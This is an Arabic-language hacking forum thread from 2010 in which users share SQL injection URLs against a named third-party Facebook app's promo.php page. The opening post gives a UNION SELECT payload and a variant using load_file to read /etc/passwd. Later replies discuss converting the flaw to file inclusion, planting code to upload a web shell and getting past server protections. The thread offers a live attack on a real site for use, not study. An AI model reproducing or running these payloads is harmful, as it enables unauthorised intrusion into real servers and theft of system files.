~ facebook sql Injection xD ~

Dr.NaNo · 08-26-2010, 09:09 AM

كود PHP:

  http://apps.facebook.com/myhotdeals/promo.php?promoid=150+and+1=2+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--

/etc/passwd

كود PHP:

  http://apps.facebook.com/myhotdeals/promo.php?promoid=150+and+1=2+union+all+select+1,2,3,4,5,load_file%28%27/etc/passwd%27%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--

لازم نطورهــــــآأ هع

بالتوفيــــــٌق

المصدر: :: vBspiders Professional Network ::

Z facebook sql Injection xD

kanvi · 08-26-2010, 01:40 PM

تفضل اخي و قمت بشرح عملية الحقن

اختـــــــــــراق سرفـــــــــير app.facebook

X HuNter · 08-26-2010, 02:12 PM

cool

Dr.NaNo · 08-26-2010, 03:22 PM

اقتباس

المشاركة الأصلية كتبت بواسطة kanvi


	تفضل اخي و قمت بشرح عملية الحقن اختـــــــــــراق سرفـــــــــير app.facebook

اهلين اخي نورت الموضوع ..

بالنسبه ياغالي انت اخترقت الـ app facebook او حقنته او نسخت الروابط تبع الحقن من المنتديات

لان جميع ثغرات السكربتات الي في الفي سبوك كلها في مواقع السكيورتي ..:d

وانا جبت الروابط عشان نطورها فقط لا غير ..

والي يهمنا في الموضوع الحقـنه الثانيه الي هي .:

كود PHP:

     http://apps.facebook.com/myhotdeals/promo.php?promoid=150+and+1=2+union+all+select+1,2,3,4,5,load_file%28%27/etc/passwd%27%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--

لان نقدر .. نغير الـ sql إلـى lfi ونزرع كود رفع الشل ونرفع الشل بس الي بوقف امامنا بعض حمايات السيرفر

ولما نكون مع بعض نفكر ونتخطى الحمايات فلسطين

بالتوفيــق

Dr.NaNo · 08-26-2010, 03:23 PM

اقتباس

المشاركة الأصلية كتبت بواسطة X HuNter


	cool

شكرأ ..

اللهـم إني صايـم .

بالتوفيق

kanvi · 08-27-2010, 01:02 PM

اقتباس

المشاركة الأصلية كتبت بواسطة Dr.NaNo


	اهلين اخي نورت الموضوع .. بالنسبه ياغالي انت اخترقت الـ app facebook او حقنته او نسخت الروابط تبع الحقن من المنتديات لان جميع ثغرات السكربتات الي في الفي سبوك كلها في مواقع السكيورتي ..:d وانا جبت الروابط عشان نطورها فقط لا غير .. والي يهمنا في الموضوع الحقـنه الثانيه الي هي .: كود PHP: `http://apps.facebook.com/myhotdeals/promo.php?promoid=150+and+1=2+union+all+select+1,2,3,4,5,load_file%28%27/etc/passwd%27%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--` لان نقدر .. نغير الـ sql إلـى lfi ونزرع كود رفع الشل ونرفع الشل بس الي بوقف امامنا بعض حمايات السيرفر ولما نكون مع بعض نفكر ونتخطى الحمايات فلسطين بالتوفيــق

بارك الله فيك اخي العزيز

نعم الثغرة مشروحة في مواقع السكريتي وهي ثغرة في تطبيقات app.facebook
وليست ثغرة facebook

يعني اذا رفعة الشل ستجده في موقع اخر وليس على
الفيس بوك

في انتظر التطوير الثغرةفلسطين
في امان الله

shapola · 10-01-2010, 10:01 PM

شكراااا يا رجالة ...... و احلى تقيم ليكم .....

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
Thumbs up into_outfile in SQL Injection شرح طريقة رفع شل عن طريق ثغرات SQL Injection	Black-FoG	SQL قواعد البيانات	73	03-14-2014 09:08 PM
ماهو الفرق بين SQL Injection و Blind SQL Injection	amer176	جـــ'ابات العناكــ'ب	6	10-04-2010 04:13 PM
Facebook Freezer v.1 لتجميد حساب الفيس بوك Facebook واختراقه	mameda	قـسـم الـبـريد الإلـكتروني والحسابات العامة	14	05-02-2010 05:04 PM
facebook	wissemch	جـــ'ابات العناكــ'ب	7	02-24-2010 05:46 PM

~ facebook sql Injection xD ~

SQL قواعد البيانات